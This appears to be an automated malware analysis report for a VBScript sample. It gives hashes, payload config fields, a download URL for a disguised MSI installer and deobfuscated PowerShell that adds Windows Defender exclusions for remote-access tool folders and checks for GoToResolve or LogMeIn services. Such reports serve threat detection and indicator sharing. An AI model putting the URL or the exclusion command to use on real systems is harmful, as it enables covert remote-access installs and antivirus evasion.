452a6a6418d71db8b812ab342ac46f6f
VBScript | MD5: 452a6a6418d71db8b812ab342ac46f6f | Size: 7.37 KB | text/vbscript
|
Hash | Hash Value |
|---|---|
| MD5 | 452a6a6418d71db8b812ab342ac46f6f
|
| Sha1 | 5ebdf8da43368a0741d8d06f9893d1781d501003
|
| Sha256 | fc51071791ed9c91dc0b685d807ec877cb0d9177dea77292dde9b895f61fa67a
|
| Sha384 | 291a9b539bb37dfd7e3c2686207fadb37dcba27a1f6ba4fa9c4bdcde1332a21aa541b5384a00cd91b4f12e6e61d66350
|
| Sha512 | 40339b354cc8a859033e02e9c2001772ec564a1fe8051b5d5cbd7396fbfbcccaeacf5d0e839da2419a92cdf16be4da8e42c03e33f77de52b5d3e1aba93ce4faf
|
| SSDeep | 192:K2yXipkZ4o/6/zc/e/3v7E/e/UBl7/yRGYt/r/6ksm/3:ByXim+ZyqKs
|
| TLSH | 3DE1A74B640702B4C57385BBA577261EF85521176B441424FBDD8A91CF3CB2EB3E50EA
|
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cacheBustedUrl & |
| Payload Destination | & tmpFile & |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://docinstall.top/new/LogM.msi |
| Deobfuscated PowerShell | Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\GoToResolve", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent") |
| Deobfuscated PowerShell | $s = Get-Service | Where-Object $_."DisplayName" -like "*GoToResolve*" -or $_."DisplayName" -like "*LogMeIn*" if ($s."Status" -eq "Running") { exit 0 } else { exit 1 } |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cacheBustedUrl & |
| Payload Destination | & tmpFile & |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://docinstall.top/new/LogM.msi |
452a6a6418d71db8b812ab342ac46f6f |
| Deobfuscated PowerShell | Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\GoToResolve", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent") Malicious |
452a6a6418d71db8b812ab342ac46f6f > 452a6a6418d71db8b812ab342ac46f6f.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $s = Get-Service | Where-Object $_."DisplayName" -like "*GoToResolve*" -or $_."DisplayName" -like "*LogMeIn*" if ($s."Status" -eq "Running") { exit 0 } else { exit 1 } Malicious |
452a6a6418d71db8b812ab342ac46f6f > 452a6a6418d71db8b812ab342ac46f6f.deobfuscated.vbs > [Command #1] > [PowerShell Command] |